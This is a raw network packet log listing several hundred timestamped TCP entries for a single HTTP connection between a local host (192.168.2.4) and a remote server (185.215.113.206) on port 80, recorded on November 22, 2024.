Nov 22, 2024 20:35:24.408375025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.408413887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.409213066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.409260035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.409307003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.409348011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.410171986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.410214901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.410278082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.410319090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.411154985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.411201000 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.411335945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.411381006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.412050962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.412095070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.412162066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.412203074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.412990093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.413038015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.413091898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.413130045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.413949966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.413992882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.414058924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.414102077 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.414868116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.414915085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.414942026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.414980888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.415818930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.415863037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.415884018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.415925026 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.416759014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.416804075 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.416870117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.416910887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.417854071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.417912960 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.417975903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.418015003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.418984890 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.419028997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.419111013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.419162989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.419697046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.419739962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.419863939 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.419905901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.420490980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.420535088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.420594931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.420636892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.421432972 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.421473980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.421540976 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.421580076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.422362089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.422406912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.422471046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.422508001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.423384905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.423435926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.423531055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.423569918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.424268007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.424305916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.424369097 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.424403906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.425211906 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.425261021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.425425053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.425458908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.426125050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.426215887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.426222086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.426251888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.427062035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.427105904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.427159071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.427195072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.428004026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.428054094 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.428122044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.428154945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.428945065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.428983927 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.460741043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.460822105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.460874081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.460899115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.461159945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.461205959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.461232901 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.461296082 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.461883068 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.461932898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.462013006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.462058067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.462847948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.462894917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.463238001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.463282108 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.463898897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.463942051 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.464015007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.464057922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.464701891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.464745998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.464812040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.464863062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.465653896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.465701103 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.465778112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.465821981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.466604948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.466651917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.466749907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.466790915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.467538118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.467617035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.467647076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.467681885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.468472004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.468530893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.468575954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.468630075 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.469424963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.469474077 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.469547033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.469587088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.470386028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.470434904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.470472097 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.470513105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.471292019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.471350908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.471405029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.471448898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.472248077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.472294092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.472341061 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.472384930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.473174095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.473220110 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.473284006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.473325968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.474107027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.474153996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.474225998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.474268913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.475128889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.475172043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.475208998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.475250006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.476003885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.476049900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.476063013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.476129055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.476947069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.476990938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.477041960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.477086067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.477874994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.477926970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.478001118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.478048086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.478770018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.478841066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.534567118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.534630060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.534687996 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.534729004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.534977913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.535027027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.535128117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.535173893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.535227060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.535274982 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.536104918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.536150932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.536216974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.536258936 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.537036896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.537082911 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.537138939 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.537183046 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.537938118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.537985086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.593657017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.593688011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.593935966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.593978882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.594017029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.594062090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.594150066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.594779968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.594826937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.594832897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.594871044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.595696926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.595742941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.595801115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.595844984 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.596601963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.596646070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.596704006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.596741915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.597548962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.597593069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.597807884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.597847939 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.598484039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.598527908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.598577023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.598618031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.599410057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.599488974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.599539995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.599581003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.600378036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.600421906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.600487947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.600548983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.601258993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.601303101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.601351023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.601388931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.602339983 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.602389097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.602535009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.602576971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.603709936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.603756905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.603812933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.603853941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.604597092 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.604641914 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.604672909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.604711056 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.605273962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.605321884 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.605350971 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.605390072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.605983973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.606028080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.606045008 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.606081009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.606909990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.606966972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.607028961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.607069016 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.607865095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.607912064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.607950926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.607996941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.608963013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.609013081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.609070063 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.609110117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.609720945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.609778881 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.609818935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.609858036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.610660076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.610692024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.610707045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.610749960 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.611615896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.611660004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.611715078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.611757994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.612607956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.612659931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.612694025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.612732887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.613498926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.613543987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.613588095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.613639116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.614424944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.614474058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.614531994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.614573956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.615422964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.615464926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.615473032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.615520954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.616348982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.616394043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.616439104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.616480112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.617233038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.617278099 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.617336035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.617374897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.618182898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.618232965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.618284941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.618326902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.619174004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.619240999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.619318008 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.619362116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.620116949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.620163918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.620253086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.620296955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.620956898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.621005058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.653088093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.653141022 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.653208017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.653248072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.653312922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.653352976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.653544903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.653597116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.653693914 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.653738976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.654481888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.654545069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.654587030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.654628038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.655422926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.655469894 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.655514956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.655556917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.656413078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.656466007 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.656562090 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.656606913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.657314062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.657357931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.657484055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.657536983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.658281088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.658328056 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.658349991 CET	80	49750	185.215.113.206	192.168.2.4
